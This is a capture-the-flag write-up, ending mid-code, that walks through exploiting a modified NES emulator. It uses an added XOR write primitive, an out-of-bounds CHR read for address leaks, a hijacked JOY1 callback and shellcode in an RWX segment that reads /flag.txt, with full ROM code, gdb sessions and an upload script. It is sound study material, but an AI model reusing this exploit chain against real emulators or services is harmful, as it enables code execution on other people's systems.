Introduction

Last weekend, I participated in ASIS CTF. While I did not manage to solve this challenge during the competition, I did manage to upsolve it afterwards with some limited help from the author!

Credits

During the CTF I made the mistake of trying to write my exploit primarily in assembly. In retrospect this was not ideal: a high-level language like C takes care of managing the stack and gives me access to 32-bit integer types. The player who solved the challenge, ptr-yudai, posted their solution, and I in turn used some of the helper functions they had written. However, both my exploitation method and the vulnerability I used were different. Since I used some of their code and templating, I wanted to give credit where it is due! Please check out their amazing blog at https://ptr-yudai.hatenablog.com/

About

This challenge involves exploiting an NES emulator called SimpleNES. On top of the standard source code, the challenge adds two opcodes, bka and bkx, as well as a 64-bit register, bk_off. The NES is programmed in 6502 assembly, which has several 8-bit registers; the one of chief concern here is AC (r_A), the accumulator. For more information, the language spec is detailed here.

The challenge consists of creating a ROM that exploits the emulator. Once the ROM has been submitted, no further action is allowed from the client side. In other words, everything has to be handled by the ROM. Something I realized later is that stdin is also closed, making any kind of input impossible.

//CPU.cpp
            case BKA:
                bk_off = (bk_off << 8) + r_A;
                break;
            case BKX:
                m_bus.xorAt(bk_off, r_A);
                break;
//MainBus.cpp
    void MainBus::xorAt(uint64_t off, Byte value)
    {
        // Exfil the byte and hide the output from user
        syscall(STDOUT_FILENO,1,(void *)&m_RAM[off],1); 
        syscall(STDOUT_FILENO,1,(void *)"\r",1); 
        m_RAM[off] ^= value;
    }

The bka opcode shifts the bk_off register left by 8 bits and places the AC register in the low byte. The bkx opcode triggers a call to the MainBus’s xorAt function, which XORs the byte at m_RAM + bk_off with the value in AC. It also leaks the original byte to the user over stdout, but not to the ROM. Combined, the two give an arbitrary write primitive relative to m_RAM.
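
To make the register behaviour concrete, here is a rough Python model of the two opcodes. It is only a sketch and not the emulator's code: BkModel, set_offset and the tiny ram buffer are names I made up for illustration, and unlike the real xorAt the model only works for in-range offsets.

```python
MASK64 = (1 << 64) - 1

class BkModel:
    """Toy model of the two added opcodes (not the emulator's code)."""
    def __init__(self, ram_size=0x800):
        self.bk_off = 0
        self.ram = bytearray(ram_size)

    def bka(self, a):
        # bk_off = (bk_off << 8) + r_A, truncated to 64 bits like uint64_t
        self.bk_off = ((self.bk_off << 8) + (a & 0xFF)) & MASK64

    def bkx(self, a):
        # The real xorAt does no bounds check; this model only
        # handles in-range offsets so that it stays runnable.
        self.ram[self.bk_off] ^= a & 0xFF

def set_offset(m, offset):
    # Feed the 8 offset bytes most significant first.
    for b in offset.to_bytes(8, "big"):
        m.bka(b)

m = BkModel()
m.bk_off = 0xDEADBEEFCAFEF00D   # stale value left by an earlier write
set_offset(m, 0x123)            # 8 shifts push the stale value out
m.bkx(0x41)                     # 0x00 ^ 0x41 = 0x41
m.bkx(0x41 ^ 0x42)              # XOR with the difference to reach 0x42
print(hex(m.bk_off), hex(m.ram[0x123]))
```

Two things fall out of the model: eight bka calls always fully replace bk_off regardless of its previous value, and because the write is an XOR, the byte already at the target has to be known to end up with a chosen value.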

Trigger vuln from ROM

;pwn_asm.s
.export _bka
.export _bkx

_bka:
    .byte $13
    rts

_bkx:
    .byte $37
    rts

//pwn.c
extern void bka(uint8_t a);
extern void bkx(uint8_t a);

void reset() {
  //bka(0); bka(0); bka(0); bka(0);
  bka(0); bka(0); bka(0); bka(0);
}

void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
  for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

void xorAt(uint32_t offset, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

Constraints

While we do get to write anywhere, there is no given way to leak addresses into the ROM’s memory. A leak is needed to compute the offset from m_RAM to anything at a higher address. This will be addressed later.

Compiling the ROM

The ROM can be compiled with the cc65 package. I used the following makefile to build it. (Thanks again to ptr-yudai for helping me figure out how to get C compilation working.)

all:
	cc65 -O -t c64 pwn.c
	ca65 -t c64 pwn.s
	ca65 -t c64 pwn_asm.s
	cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o

Attack Vector

To start, I want to discuss my chosen attack vector. I noticed that a series of callbacks is registered for reads and writes to special physical addresses. This struck me as a solid target, because overwriting one should give me a way to redirect execution!

Callback assignment

    Emulator::Emulator() :
        m_cpu(m_bus),
        m_ppu(m_pictureBus, m_emulatorScreen),
        m_screenScale(3.f),
        m_cycleTimer(),
        m_cpuCycleDuration(std::chrono::nanoseconds(559))
    {
        if(!m_bus.setReadCallback(PPUSTATUS, [&](void) {return m_ppu.getStatus();}) ||
            !m_bus.setReadCallback(PPUDATA, [&](void) {return m_ppu.getData();}) ||
            !m_bus.setReadCallback(JOY1, [&](void) {return m_controller1.read();}) ||
            !m_bus.setReadCallback(JOY2, [&](void) {return m_controller2.read();}) ||
            !m_bus.setReadCallback(OAMDATA, [&](void) {return m_ppu.getOAMData();}))
        {
            LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
        }


        if(!m_bus.setWriteCallback(PPUCTRL, [&](Byte b) {m_ppu.control(b);}) ||
            !m_bus.setWriteCallback(PPUMASK, [&](Byte b) {m_ppu.setMask(b);}) ||
            !m_bus.setWriteCallback(OAMADDR, [&](Byte b) {m_ppu.setOAMAddress(b);}) ||
            !m_bus.setWriteCallback(PPUADDR, [&](Byte b) {m_ppu.setDataAddress(b);}) ||
            !m_bus.setWriteCallback(PPUSCROL, [&](Byte b) {m_ppu.setScroll(b);}) ||
            !m_bus.setWriteCallback(PPUDATA, [&](Byte b) {m_ppu.setData(b);}) ||
            !m_bus.setWriteCallback(PUTC, [&](Byte b) {putchar(b);}) ||
            !m_bus.setWriteCallback(OAMDMA, [&](Byte b) {DMA(b);}) ||
            !m_bus.setWriteCallback(JOY1, [&](Byte b) {m_controller1.strobe(b); m_controller2.strobe(b);}) ||
            !m_bus.setWriteCallback(OAMDATA, [&](Byte b) {m_ppu.setOAMData(b);}))
        {
            LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
        }

        m_ppu.setInterruptCallback([&](){ m_cpu.interrupt(InterruptType::NMI); });
    }
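
The idea behind targeting the callbacks can be sketched in a few lines of Python. This is a toy model under my own assumptions (ToyBus and its methods are invented names, and the real table stores std::function objects rather than Python lambdas); it only shows why replacing one table entry redirects every later write to that address.

```python
JOY1 = 0x4016

class ToyBus:
    """Toy stand-in for a bus that dispatches writes through a callback table."""
    def __init__(self):
        self.write_callbacks = {}
        self.log = []

    def set_write_callback(self, addr, fn):
        self.write_callbacks[addr] = fn

    def write(self, addr, value):
        cb = self.write_callbacks.get(addr)
        if cb is not None:
            cb(value)

bus = ToyBus()
bus.set_write_callback(JOY1, lambda b: bus.log.append(("strobe", b)))
bus.write(JOY1, 1)

# "Corrupt" the table entry, as the write primitive would do in memory.
bus.write_callbacks[JOY1] = lambda b: bus.log.append(("hijacked", b))
bus.write(JOY1, 1)
print(bus.log)
```

The ROM controls when the hijacked entry fires, since it decides when to write to JOY1.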

So, I decided to check this out with a debugger. As a quick aside, when debugging challenges where a Dockerfile is provided, I like to modify it to install git, gdb, and vim, and debug from within the container. Sometimes I debug locally as well, but for the most part I think it is better to stay as true to the target environment as possible.

ROM script to debug

//JOY1 = 0x4016
void debug(){
    while(1) *(uint8_t*)JOY1 = 1;
}

int main(void) {
    debug();
}

All this does is loop a write to JOY1, which will allow me to test my attack idea.

I found the callback list in memory using the information provided. By searching for the pointer to m_RAM, I can find the MainBus object, which holds a pointer to the callback table.

gdb-peda$ find 0x5555570e1220
Searching for '0x5555570e1220' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
gdb-peda$ x/10gx 0x7ffdb5a026d0
0x7ffdb5a026d0: 0x00005555570e1220      0x00005555570e1a20
0x7ffdb5a026e0: 0x00005555570e1a20      0x00005555574e1bf0
0x7ffdb5a026f0: 0x00005555574e3bf0      0x00005555574e3bf0
0x7ffdb5a02700: 0x00005555571840a0      0x00005555574dc170
0x7ffdb5a02710: 0x000000000000000d      0x00005555574dc3e0
gdb-peda$ x/10gx 0x00005555574dc3e0
0x5555574dc3e0: 0x00005555574dc3a0      0x00007ffb00002004
0x5555574dc3f0: 0x00007ffdb5a026d0      0x0000000000000000
0x5555574dc400: 0x00007ffbceb8d3d8      0x00007ffbceb8d396
0x5555574dc410: 0x00005555574d9d80      0x0000000000000031
0x5555574dc420: 0x706d742f706d742f      0x6b6d6f3533763835
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360      0x00007ffb00004016 <- addr 0x4016!
0x5555574dc3b0: 0x00007ffdb5a026d0      0x0000000000000000
0x5555574dc3c0: 0x00007ffbceb8d2c9      0x00007ffbceb8d287 <- function ptrs
0x5555574dc3d0: 0x00005555574d9d40      0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0      0x00007ffb00002004

To test my idea, I just need to change the function pointers to dummy values.

gdb-peda$ set *0x5555574dc3c0 = 0x4141414141
gdb-peda$ set *0x5555574dc3c4 = 0x4141414141
gdb-peda$ set *0x5555574dc3c8 = 0x4242424242
gdb-peda$ set *0x5555574dc3cc = 0x4242424242
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360      0x00007ffb00004016
0x5555574dc3b0: 0x00007ffdb5a026d0      0x0000000000000000
0x5555574dc3c0: 0x4141414141414141      0x4242424242424242
0x5555574dc3d0: 0x00005555574d9d40      0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0      0x00007ffb00002004

Since I am looping over a write to JOY1, let’s see if continuing gives a crash.

gdb-peda$ c
Continuing.

Thread 1 "ld-linux-x86-64" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBX: 0x4242424242424242 ('BBBBBBBB')
RCX: 0x5555574dc3a8 --> 0x7ffb00004016
RDX: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RSI: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RDI: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBP: 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
RSP: 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
RIP: 0x7ffbceb96de4 (call   rbx)
R8 : 0xff
R9 : 0x7ffb910f2010 --> 0x0
R10: 0x7ffdb5a01e90 --> 0x8d007ffdb5a02840
R11: 0x7ffdb5b8c080 (MemError)
R12: 0x1
R13: 0x7ffbceb80f29 (endbr64)
R14: 0x7ffbcebb7310 --> 0x7ffbceb80ee0 (endbr64)
R15: 0x7ffbcebf3040 --> 0x7ffbcebf42f0 --> 0x7ffbceb5d000 --> 0x10102464c457f
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffbceb96dda:      mov    rax,QWORD PTR [rbp-0x18]
   0x7ffbceb96dde:      mov    rsi,rdx
   0x7ffbceb96de1:      mov    rdi,rax
=> 0x7ffbceb96de4:      call   rbx
   0x7ffbceb96de6:      nop
   0x7ffbceb96de7:      mov    rbx,QWORD PTR [rbp-0x8]
   0x7ffbceb96deb:      leave
   0x7ffbceb96dec:      ret
Guessed arguments:
arg[0]: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
arg[1]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
arg[2]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
[------------------------------------stack-------------------------------------]
0000| 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
0008| 0x7ffdb5a01dc8 --> 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0016| 0x7ffdb5a01dd0 --> 0x7ffdb5a01e10 --> 0x0
0024| 0x7ffdb5a01dd8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0032| 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
0040| 0x7ffdb5a01de8 --> 0x7ffbceb95d04 (jmp    0x7ffbceb96013)
0048| 0x7ffdb5a01df0 --> 0x4016b5a01e01
0056| 0x7ffdb5a01df8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffbceb96de4 in ?? ()
gdb-peda$

Perfect: a segfault on a call to rbx with the injected value inside, which proves the exploitation vector is valid.

Bad News

Since I have no way to leak any values, there is really nothing useful I can put in here quite yet. I looked for a while to see if there were any gadgets I could reach by changing only the lower 12 bits, but couldn’t find anything. This is where I got stuck during the CTF. I tried many things revolving around reading from MainBus memory, but got nowhere. I knew I needed the leak, but couldn’t find it…

Dream Come True

After a long night filled with restless thoughts of a challenge not yet completed, I awoke to a joyous sight. In addition to some details from the only person who solved the challenge, ptr-yudai, the challenge author said: “Intended way to get leaks was using oob in dream memory handler. It doesn't bound check its x * 0x2000+y.” So, I set forth on a mission to figure out how to get the leaks from this.

I found the vulnerable code segment, which matches the description, in readCHR.

//MapperColorDreams.cpp
    Byte MapperColorDreams::readCHR(Address address)
    {
        if (address <= 0x1FFF)
        {
            return   m_cartridge.getVROM()[(chrbank * 0x2000) + address];
        }

        return 0;
    }
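
To see why this is out of bounds, here is a small Python sketch of the index arithmetic only. chr_index is a name I made up, and the single 8KB bank is taken from the header of my ROM (see the run log further down); nothing here touches real memory.

```python
CHR_BANK_SIZE = 0x2000

def chr_index(chrbank, address):
    """Index readCHR would use for a PPU address, or None if address > 0x1FFF."""
    if address <= 0x1FFF:
        return chrbank * CHR_BANK_SIZE + address
    return None

vrom_size = 1 * CHR_BANK_SIZE   # one 8KB CHR-ROM bank
for bank in (0, 1):
    idx = chr_index(bank, 0x3F0)
    where = "in bounds" if idx < vrom_size else "out of bounds"
    print(bank, hex(idx), where)
```

The address check only constrains the PPU address, never the bank, so any chrbank that is not backed by real CHR data reads past the end of the vector.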

MapperColorDreams class

class MapperColorDreams : public Mapper
{
public:
    MapperColorDreams(Cartridge &cart, std::function<void(void)> mirroring_cb);
    NameTableMirroring getNameTableMirroring();
    void writePRG(Address address, Byte value);
    Byte readPRG(Address address);
    Byte readCHR(Address address);
    void writeCHR(Address address, Byte value);
private:
    NameTableMirroring m_mirroring;
    uint32_t prgbank;
    uint32_t chrbank; //<- value used for calculating the chrbank offset
    std::function<void(void)> m_mirroringCallback;
};

The cartridge mapper is selected at runtime based on the ROM header. If the header specifies mapper 11 (0xb), the Color Dreams mapper is chosen when the mapper is created. I set this value in Python before uploading the ROM.

upload.py

from pwn import *
from binascii import hexlify

r = remote("localhost", 1337)

with open("./pwn.nes", "rb") as f:
    data = list(f.read())

#patch in dream mapper
data[6] = (data[6] & 0x0f) | (11 << 4)
to_send = hexlify(bytes(data))
#log.info(f"sending data> {to_send}")
r.sendlineafter(b':\n', to_send)

#keep a copy of the patched ROM for local debugging
with open("./test.nes", "wb") as out:
    out.write(bytes(data))
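
For reference, this is roughly how the patched byte maps to a mapper number. The sketch assumes the standard iNES layout (low mapper nibble in the top half of byte 6, high nibble in the top half of byte 7); I have not checked that the challenge's Cartridge.cpp parses it exactly this way, and mapper_number, patch_mapper and the header bytes are made up for illustration.

```python
def mapper_number(header):
    """Mapper number from a 16-byte iNES header (bytes 6 and 7)."""
    return (header[6] >> 4) | (header[7] & 0xF0)

def patch_mapper(header, mapper):
    """Return a copy with the mapper nibble in byte 6 replaced, as upload.py does."""
    out = bytearray(header)
    out[6] = (out[6] & 0x0F) | ((mapper & 0x0F) << 4)
    return bytes(out)

# Made-up header: magic, 2 PRG banks, 1 CHR bank, flags6 = 0x03 (mapper 0)
header = b"NES\x1a" + bytes([2, 1, 0x03, 0x00]) + bytes(8)
patched = patch_mapper(header, 11)
print(mapper_number(header), mapper_number(patched), hex(patched[6]))
```

The low nibble of byte 6 carries the mirroring and battery flags, which is why the patch masks with 0x0f instead of overwriting the whole byte.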

A key thing to note is that the Mapper is dynamically allocated. This can be confirmed by looking at the disassembly; see the operator new() call.

disassembly

Bug

The OOB is pretty simple: by corrupting the chrbank value on the heap using our write primitive, we can then read outside of the allocated CHR memory. All that is needed is the offset to the heap object for the dream mapper; the xor primitive can then be used to set chrbank to whatever we want. In this case 1 will suffice.

xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);

The next step is to read from CHR memory, which can be done like this:

uint8_t get_data(uint16_t addr){
    //write the address to PPUADDR
    uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
    *(uint8_t*)(PPUADDR) = a;
    *(uint8_t*)(PPUADDR) = b;
    //read the value at chrbank+addr and return
    return *(uint8_t*)PPUDATA;
}
//helper function to handle leaking
void leak(uint16_t offset, uint32_t* high, uint32_t* low){
    uint8_t i = 0;
    get_data(0);
    for(i = 0; i < 4; i++)
        *low |= (uint32_t)get_data(offset+i+1)<<(i*8);
    for(i = 0; i < 4; i++)
        *high |= (uint32_t)get_data(offset+i+5)<<(i*8);
    get_data(0);
}
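
The byte assembly in leak() can be sketched in Python as follows. This only models how eight bytes, least significant first, become the (high, low) pair; it does not model the PPU reads themselves or the get_data(0) calls around them, and assemble is a name I made up.

```python
def assemble(leaked):
    """Combine 8 leaked bytes (least significant first) into (high, low) halves."""
    low = high = 0
    for i in range(4):
        low |= leaked[i] << (i * 8)
    for i in range(4):
        high |= leaked[4 + i] << (i * 8)
    return high, low

# Example pointer taken from the local run shown later in this post.
raw = (0x7FAF77A11A00).to_bytes(8, "little")
high, low = assemble(raw)
print(hex(high), hex(low))
```

Since the C helper uses |= on its output arguments, both halves have to be zeroed before each call, which is why the leak code sets them to 0 first.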

Next, calculate the addresses of the values to be leaked. In my case, I chose two values, one from ld and one from the heap. I will explain my choice in the RWX section below.

leak vals

uint32_t rwx_low, rwx_high;
uint32_t mram_low, mram_high;

rwx_low = rwx_high = 0;
//ld
leak(LD_OFF, &rwx_high, &rwx_low);
rwx_low -= RWX_OFF;
rwx_low &= 0xFFFFFF00;

mram_low = mram_high = 0;
//heap
leak(HEAP_OFF, &mram_high, &mram_low);
mram_low -= M_RAM_OFF; //set the heap leak to m_RAM

What I missed

The key thing I missed during the competition was the presence of the PPU and PictureBus. I will leave it to you to review the source code and figure out what they do, but the important thing is that they provide another way to read memory. During the CTF I searched for bugs in the MainBus, overlooking CHR memory entirely. Had I looked a bit closer at the read/write callbacks I had access to, I might have noticed the PPUADDR and PPUDATA callbacks. Thus, my resolution for 2024 is to read more source code!

RWX

One thing I noticed while poking around with the debugger is that there is a RWX segment of memory in ld. As discussed before, I can overwrite the callback function for JOY1 to call anywhere I want, so why not call some shellcode? This is exactly what I ended up doing.

To do this, I will use the aforementioned xorAt function to write the shellcode to the segment. For this, I need to calculate the offset between m_RAM and the RWX segment.

uint32_t mram_rwx_off_low, mram_rwx_off_high;

sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
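
Since cc65 has no 64-bit integer type, the subtraction is done on 32-bit halves with a manual borrow. Here is a Python sketch of the same arithmetic, checked against the addresses from the local run shown later in this post; the masking with M32 stands in for C's unsigned wraparound.

```python
M32 = 0xFFFFFFFF

def sub64(al, ah, bl, bh):
    """(ah:al) - (bh:bl) on 32-bit halves, returning (low, high)."""
    xl = (al - bl) & M32
    borrow = 1 if al < bl else 0      # low half wrapped around
    xh = (ah - bh - borrow) & M32
    return xl, xh

rwx = 0x7FAF77A11A00
m_ram = 0x555556100220
xl, xh = sub64(rwx & M32, rwx >> 32, m_ram & M32, m_ram >> 32)
print(hex((xh << 32) | xl))
```

The result matches the m_RAM_rwx_off value printed by the upload script for that run.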

Next, I write the shellcode to this offset. There is some existing data there, but it is easy enough to handle: the data is always the same, so I can xor my shellcode against it before writing.

uint8_t i,j;

for(i = 0; i < SHELLCODE_SZ; i++)
  shellcode[i] ^= pattern[i%0x10];

//create nopsled
for(i = 0; i < 0x10; i++)
	pattern[i] ^= 0x90;

//sometimes values are slightly different, so I spray a few times
for(j = 0; j < SPRAY_CNT;j++){
    for(i = 0; i < 0xb0; i++){
        xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
    }
    mram_rwx_off_low+= 0xb0;
        //write shellcode
    for(i = 0; i < SHELLCODE_SZ; i++)
        xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
    mram_rwx_off_low += 0x50;
}
mram_rwx_off_low -= SPRAY_CNT*0x100;
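
Here is a small Python sketch of why pre-XORing against the existing bytes works. It assumes, as my exploit does, that the target region holds the 16-byte pattern repeated from an aligned start; region, wanted and xor_write are illustrative names, and the bytearray stands in for the RWX segment.

```python
pattern = bytes([0x64, 0x4c, 0x8b, 0x1c, 0x25, 0x28, 0xff, 0xff,
                 0xff, 0x41, 0xff, 0xa3, 0x18, 0x3c, 0x00, 0x00])

def xor_write(memory, offset, values):
    """Apply the XOR-only write primitive byte by byte."""
    for i, v in enumerate(values):
        memory[offset + i] ^= v

region = bytearray(pattern * 2)          # pretend RWX contents
wanted = bytes([0x90] * 16) + bytes([0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0])

# Value to send for each byte: wanted XOR what is already there.
deltas = bytes(w ^ pattern[i % 0x10] for i, w in enumerate(wanted))
xor_write(region, 0, deltas)
print(region[:len(wanted)].hex())
```

If the bytes in the segment differ from the assumed pattern, the result is garbage at those positions, which is the reason for spraying several copies.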

shellcode

   0:   48 31 d2                xor    rdx,rdx
   3:   48 31 c0                xor    rax,rax
   6:   48 31 f6                xor    rsi,rsi
   9:   48 bb 6c 6f 6c 6c 6f    movabs rbx,0x746c6c6f6c6c6f6c ;'lollollt'
  10:   6c 6c 74
  13:   48 c1 eb 38             shr    rbx,0x38
  17:   53                      push   rbx
  18:   48 bb 2f 66 6c 61 67    movabs rbx,0x78742e67616c662f ;'/flag.tx', the final 't' was pushed above
  1f:   2e 74 78
  22:   53                      push   rbx
  23:   48 89 e7                mov    rdi,rsp
  26:   b0 02                   mov    al,0x2
  28:   0f 05                   syscall ;int fd = open("/flag.txt", O_RDONLY, 0);
  2a:   48 89 c7                mov    rdi,rax
  2d:   48 31 c0                xor    rax,rax
  30:   48 89 e6                mov    rsi,rsp
  33:   ba 00 01 00 00          mov    edx,0x100
  38:   0f 05                   syscall ;n = read(fd, rsp, 0x100);
  3a:   48 89 c2                mov    rdx,rax
  3d:   b8 01 00 00 00          mov    eax,0x1
  42:   bf 01 00 00 00          mov    edi,0x1
  47:   0f 05                   syscall ;write(STDOUT, rsp, n);

//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
    0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
    0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
    0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
    0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
    0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
    0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
    0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
    0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
    0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
    0x05,0x00,0x00,0x00,0x00,0x00,0x00,};

uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc
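
The two pushes that build the file name are easy to misread, so here is a quick Python check of what ends up on the stack. It only reproduces the constants from the disassembly; the variable names are mine.

```python
import struct

first_push = 0x746C6C6F6C6C6F6C >> 0x38   # shr rbx,0x38 leaves only 0x74, 't'
second_push = 0x78742E67616C662F          # '/flag.tx' in little-endian order

# The stack grows down, so the second push sits at the lower address (rsp).
stack = struct.pack("<Q", second_push) + struct.pack("<Q", first_push)
path = stack.split(b"\x00", 1)[0]
print(path)
```

The shift is what provides the terminating NUL bytes after the final 't' without placing any zero bytes in the immediate itself.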

Last Step

All that is left is to overwrite the JOY1 callback function with the address of the shellcode. This is easier than one may expect, as the ld library is mapped right next to the main binary for SimpleNES. So, the address of the callback function can be computed from the previously leaked RWX address. From there, I xor the function pointer against the shellcode address, and use the xorAt primitive to corrupt the callback function for JOY1 writes!

uint32_t joycon_cb_fn_low, overwrite;

overwrite = rwx_low;
joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
overwrite ^= joycon_cb_fn_low;
overwrite |= 0x800;
for(i = 0; i < 4; i++)
    xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
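
The pointer rewrite is the same XOR trick applied to a known value. Below is a simplified Python sketch: xor_deltas and apply are made-up names, the upper half of the example pointers is a placeholder, and the extra `|= 0x800` adjustment from my code is deliberately left out.

```python
def xor_deltas(current, target, nbytes=4):
    """Per-byte XOR values (least significant first) that turn current into target."""
    delta = current ^ target
    return [(delta >> (i * 8)) & 0xFF for i in range(nbytes)]

def apply(pointer, deltas):
    """What the stored pointer looks like after the byte-wise XOR writes."""
    for i, d in enumerate(deltas):
        pointer ^= d << (i * 8)
    return pointer

rwx_low = 0x77A11A00
upper = 0x7FAF << 32                       # placeholder shared upper half
current = upper | (rwx_low - 0x62D79)      # hypothetical callback pointer
target = upper | rwx_low                   # where the shellcode lives

deltas = xor_deltas(current, target)
print([hex(d) for d in deltas], hex(apply(current, deltas)))
```

Touching only the low four bytes is enough when both addresses share the same upper 32 bits, which is the point of the two mappings being neighbours.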

And that’s it! All that’s left to do is trigger the JOY1 callback and enjoy our code execution.

*(uint8_t*)JOY1 = i;
while(1);
return 0;

Moment of Truth

[gold3nboy@arch exp]$ ./upload.py
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
[+] Opening connection to localhost on port 1337: Done
/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[MainBus.cpp:12] Allocated m_RAM at: 0x555556100220
[Cartridge.cpp:52] Reading ROM from path: /tmp/tmpmctjnwke
[Cartridge.cpp:70] Reading header, it dictates:
[Cartridge.cpp:73] 16KB PRG-ROM Banks: 2
[Cartridge.cpp:81] 8KB CHR-ROM Banks: 1
[Cartridge.cpp:91] Name Table Mirroring: Vertical
[Cartridge.cpp:95] Mapper #: 11
[Cartridge.cpp:98] Extended (CPU) RAM: true
[Cartridge.cpp:112] ROM is NTSC compatible.
[Cartridge.cpp:121] Allocated m_PRG_ROM at: 0x555556502bd0
[Cartridge.cpp:127] Allocated m_CHR_ROM at: 0x55555650abe0
Error while enumerating udev devices
Setting vertical sync not supported
\x00
[*] rwx: 0x7faf77a11a00
[*] m_RAM: 0x555556100220
[*] m_RAM_rwx_off: 0x2a5a219117e0
[*] Switching to interactive mode
GGGGGASIS{test-flag}
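
The three values printed above come from a tiny framing scheme between the ROM's log64() and leak() in upload.py: "FF", eight little-endian bytes, then "ABC". Here is a pwntools-free sketch of that framing; log64_frame and parse_frame are names I made up, and the parser assumes the payload itself contains neither marker.

```python
import struct

def log64_frame(high, low):
    """Bytes the ROM emits through PUTC: 'FF', low half, high half, 'ABC'."""
    return b"FF" + struct.pack("<II", low, high) + b"ABC"

def parse_frame(stream):
    """Extract the 64-bit value from the first frame in the stream."""
    _, _, rest = stream.partition(b"FF")
    payload, _, _ = rest.partition(b"ABC")
    return struct.unpack("<Q", payload)[0]

frame = log64_frame(0x5555, 0x56100220)
value = parse_frame(b"emulator log noise\n" + frame)
print(hex(value))
```

A leaked value containing the bytes 0x46 0x46 or 0x41 0x42 0x43 would break this parsing, so a length-based scheme would be more robust for anything beyond a quick debugging aid.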

One more thing: a shell cannot be spawned, as stdin is closed. It could be reopened, but I decided to just read and write the flag with shellcode instead. There is plenty of space to do whatever you like in the shellcode, so I’ll leave that to you.

Aside

Because I do not know the heap layout on the remote server, I have been unable to get my exploit working on remote. I have tried dumping the entire heap, but can’t find where the Mapper is being allocated (I searched manually for a long time as well). If anyone has any advice for this, I’d love to hear it. For now, I am content with getting my exploit working on my local docker instance, as I feel I have completed the challenge.

Aside-Aside

After I had given up, I finally had the idea to see if I could set chrbank some other way. It turns out I can. I was being stubborn trying to find the heap allocation for the approach I already had working, when setting the value as intended is much easier. There is only one real change.

//xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
*(uint8_t*)0x9001 = 0x10; //write 0x10 to an address above 0x8000
//this is the code that is triggered
void MapperColorDreams::writePRG(Address address, Byte value)
{
    if (address >= 0x8000)
    {
        prgbank = ((value >> 0) & 0x3);
        chrbank = ((value  >> 4) & 0xF);
    }
}
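
A quick Python sketch of the decoding shows why writing 0x10 is enough. decode_bank_write is my own name for the two assignments in writePRG, and the bank size is the 0x2000 used by readCHR.

```python
def decode_bank_write(value):
    """Mirror of the two assignments in writePRG for addresses >= 0x8000."""
    prgbank = (value >> 0) & 0x3
    chrbank = (value >> 4) & 0xF
    return prgbank, chrbank

prgbank, chrbank = decode_bank_write(0x10)
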